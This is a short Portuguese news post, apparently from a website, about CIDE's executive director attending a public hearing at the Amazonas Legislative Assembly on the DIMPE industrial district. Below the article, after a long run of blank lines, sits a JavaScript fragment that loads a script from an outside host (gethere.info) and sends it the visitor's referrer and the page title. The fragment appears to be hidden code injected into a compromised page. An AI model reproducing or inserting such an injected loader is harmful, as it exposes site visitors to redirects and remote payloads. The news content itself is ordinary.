CIDE participa de audiência pública na ALEAM

O caderno de Economia do jornal A Crítica registrou a audiência.
O caderno de Economia do jornal A Crítica registrou a audiência.

 

Com o objetivo de participar da audiência pública sobre “um novo modelo econômico de gestão para o Distrito Industrial de Micro e Pequenas Empresas (DIMPE)”, o diretor executivo do Centro de Incubação e Desenvolvimento Empresarial (CIDE), José Barbosa Grosso, esteve na Assembleia Legislativa do Amazonas (ALE-AM), no último dia 20, participando da iniciativa do presidente da Associação do DIMPE, Mário Fogaça, e de políticos locais.

 

Segundo José Grosso, as incubadoras de empresas devem gerar desenvolvimento econômico. “Nesse primeiro momento, eu vim para conhecer os problemas pelos quais passam o DIMPE e desejo que encontremos uma solução que seja viável para todos”, finaliza.

 

Participaram também representantes da Superintendência da Zona Franca de Manaus (Suframa), Federação das Indústrias do Estado do Amazonas (Fieam), Federação da Agricultura e Pecuária do Amazonas (Faea) e representante do Governo Estadual.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *